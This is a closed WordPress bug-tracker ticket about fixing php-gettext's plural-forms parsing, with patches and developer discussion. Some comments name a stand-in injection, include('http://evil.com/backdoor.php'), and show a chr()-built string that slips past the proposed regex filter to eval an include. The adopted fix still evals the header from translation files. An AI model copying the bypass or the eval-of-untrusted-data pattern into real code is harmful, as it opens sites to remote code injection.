Opened 6 years ago

Closed 6 years ago

#4005 closed defect (bug) (fixed)

php-gettext's plural forms parsing is broken for nplurals>2

Reported by: moeffju Owned by: ryan
Priority: high Milestone: 2.2
Component: I18N Version: 2.1.2
Severity: normal Keywords: has-patch i18n
Cc:

Description

Complicated Plural-Forms expression get evaluated wrongly by php-gettext, so that languages with more than two plural forms (e.g. Lithuanian, Slovenian, etc.) don't get the correct plural form for ngettext calls.
Attached patch (also sent upstream) fixes the issue.

Attachments (4)

gettext-plural-forms.patch (1.0 KB) - added by moeffju 6 years ago.
Patch against php-gettext 1.0.7 to fix plural forms parsing
gettext.php.diff (1.1 KB) - added by Sewar 6 years ago.
Modified patch for trunk (2.2)
gettext.php.2.diff (1.6 KB) - added by moeffju 6 years ago.
Fix plural forms handling, revision 2 (better input sanitizing)
gettext-plurals.diff (22.2 KB) - added by nbachiyski 6 years ago.
moeffju's fixes + select_string enhancements + indent + none whitespace at the end of lines

Download all attachments as: .zip

Change History (25)

moeffju6 years ago

Patch against php-gettext 1.0.7 to fix plural forms parsing

Oh, I just realized this patch is against the original php-gettext source, but it should be easy enough to apply to your codebase.

Sewar6 years ago

Modified patch for trunk (2.2)

  • Keywords has-patch commit added
  • Milestone changed from 2.3 to 2.1.3
  • Priority changed from low to high
  • Version set to 2.1.2

I have faced this bug during translate WP to Arabic, but i think it is bug in plural-forms expression i used.

After applying this patch, it worked like a charm.

Forged to say thank you moeffju

  • Milestone changed from 2.1.3 to 2.2

comment:5   ryan6 years ago

  • Owner changed from anonymous to ryan

Ryan, if you commit this, you could also remove the semicolon append code. A semicolon is always added in this one.

And just a note about the patch. Is the regex check really needed? What do we win if we sanitize it?

comment:7   ryan6 years ago

I'm curious about the regex too. Do we really need to sanitize against a whitelist?

I wrote that chunk of code for Habari, and just ported it over to php-gettext/wordpress. Sanitizing the plural-forms header seems reasonable since it will be eval()'d with only minor changes, and it is user-supplied data; in theory you could put something there like include('http://evil.com/backdoor.php'). Since the file format is binary and WP translations are usually supplied by third parties, the input should be treated as user input and sanitized thusly.

Re nbachiyski, good catch, although multiple semicolons should not matter.

For some additional explanation: PHP evaluates ternary operator expressions from left to right. Thus, for Plural-Forms like nplurals=3; plural=n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;:

for n = 1: (expected: 0, actual: 2)

   1%10==1 && 1%100!=11 ? 0 : 1%10>=2 && 1%10<=4 && (1%100<10 || 1%100>=20) ? 1 : 2
=> TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE) ? 1 : 2
=> (TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE)) ? 1 : 2
=> 0 ? 1 : 2
=> 2

Parenthesizing the subexpressions fixes the precedence.

It was hard, but being stubborn sometimes helps. Here is a string of code, which passes through your filter and includes an arbitrary file (I didn't have the nerve and just try to include d in the sample):

ob_start();
print(chr(105));
print(chr(110));
print(chr(99));
print(chr(108));
print(chr(117));
print(chr(100));
print(chr(101));
print(chr(32));
print(chr(34));
print(chr(100));
print(chr(34));
print(chr(59));
eval(ob_get_flush());

It was not easy without neither quotes nor comas :)

Anyway, I suggest that we just write some simple parser for php's ternary expressions. There are some nice unit tests on the topic.

While your string passes the sanitizing regex, the code is never actually run since in the next step (in select_string()), all 'n's are replaced with the value of $n, which breaks the priNt. echo would probably work. Changing the regex to:

	$expr= preg_replace(
		'@[^plurasno0-9:;\(\)\?\|\&=!<>+*/\%-]@',
		'',
		$expr
	);

ought to fix that, too. (The additional 'o' in the char range is for malformed files using 'or' instead of '||'; I also removed the underscore.)

Alternatively, you could sanitize the plurals= part separately and strip semicolons and all chars but 'n' on the RHS of the assignment:

if (preg_match('/^\s*nplurals\s*=\s*(\d+)\s*;\s*plural=(.*)$/', $expr, $matches)) {
	$nplurals= preg_replace( '@[^0-9]@', '', $matches[1] );
	$plural= preg_replace( '@[^n0-9:\(\)\?\|\&=!<>+*/\%-]@', '', $matches[2] );
	$expr= 'nplurals='.$nplurals.';plural='.$plural;
}
else {
//malformed expression, use default
}

I'll submit a new patch using the second alternative.

moeffju6 years ago

Fix plural forms handling, revision 2 (better input sanitizing)

New patch applies cleanly to trunk.

I am not sure if it is worth it to sanitize the string. There is great chance that every filtering can be compromised and cheated. Also, if somebody wants to distribute harmful code, there are surely easier ways to to it.

A side note - I think we could speed up select_string a lot. We could just the first time compile the code using create_function and then just call it to get the plural index. Something like (I haven't prepared the real patch yet):

$s = str_replace('n', '$n', $string);
$this->choose_plural_string = create_function('$n', 'return '.$s);

After that on every call of select_string we just return $this->choose_plural_string($n).
My trivial tests show that this approach is between 5 and 10 times faster. Unfortunately there aren't many plural strings, so it won't be noticeable :-)

That's what I'm doing for Habari, but I didn't want to replace the complete php-gettext plural code with Habari's ;)

Check http://trac.habariproject.org/habari/changeset?new=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40617&old=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40508 for Habari's implementation, if you want to port that. Since the php-gettext developers don't seem to care, I might split that code out to Yet Another PHP Gettext Project soon.

Yeap, it looks nice. Would you be so kind to make a patch for WP also :-)

  • Keywords needs-patch added; has-patch commit removed
  • Milestone changed from 2.2 to 2.3
  • Keywords has-patch added; needs-patch removed
  • Milestone changed from 2.3 to 2.2

foolswisdom: This is very important for most non-English users, and there's patches working well.

If we can get an updated patch that nbachiyski approves, I will gladly commit.

moeffju's fixes + select_string enhancements + indent + none whitespace at the end of lines

  • Keywords i18n added

I had some free time this morning, so here is a patch. Unfortunately one can't see my changes very clearly because I couldn't stand the indentation and fixed it before coding. Here is a summary of the changes:

  • Inside are Matthias' parenthesis fixes without the sanitizing (in get_plural_forms)
  • The select_string is cached in a dynamically created callback (in select_string)

Anyone who sees it, please test, so we can safely put this in 2.2.

Sewar, thanks for moving the milestone. We could have easily forgotten this...

  • Resolution set to fixed
  • Status changed from new to closed

(In [5266]) Fix gettext's plural forms for more than 2 plural forms. Props moeffju and nbachiyski. fixes #4005

Note: See TracTickets for help on using tickets.